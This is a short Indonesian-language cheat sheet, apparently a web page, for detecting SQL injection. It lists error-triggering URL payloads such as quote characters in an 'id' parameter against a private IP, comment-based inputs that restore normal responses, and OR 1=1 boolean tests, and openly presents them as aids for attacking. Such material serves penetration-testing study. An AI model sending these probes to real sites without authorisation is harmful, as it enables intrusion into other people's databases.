Cheat Sheet

Author : Anonputraid

Berikut Ini Adalah Contekan Untuk Memudahkan Anda Melakukan Serangan:

Detect SQL-Injection

Error Based

  • Mengirim Karakter Kutip Tunggal ` Dan Melihat Apakah Ada Perbedaan Respon Ketika Server Dikirim Menggunakan Tanda Kutip Tunggal.

  • Mengirim Sintax Khusus Pada Setiap Versi Database, Atau Anda Bisa Mencari Tau Terlebih Dahulu Apa Versi Database Tersebut, Menggunakan Alat Pemeriksa Network.

Cheat Sheet:

Return Error Response:

192.168.1.23?id=-1)'
192.168.1.23?id=1'
192.168.1.23?id=-1'
192.168.1.23?id=1\'

Restore Normal Response : 

?id=1 and 0' order by 1--+
?id=2-1
?id=1'-- Anonputraid
?id=1'--
?id=1'--
?id=1+--+

Boolean Technique

  • Menggunakan Teknik Condisional Boolean Seperti OR 1=1 DAN OR 1=2 Atau AND 1=1 & 1=2 Dan Lihat Apakah Ada Perbedaan Respon Setelah Dan Sebelum Menggunakan Teknik ini.

REFERENSI :

Last updated

Was this helpful?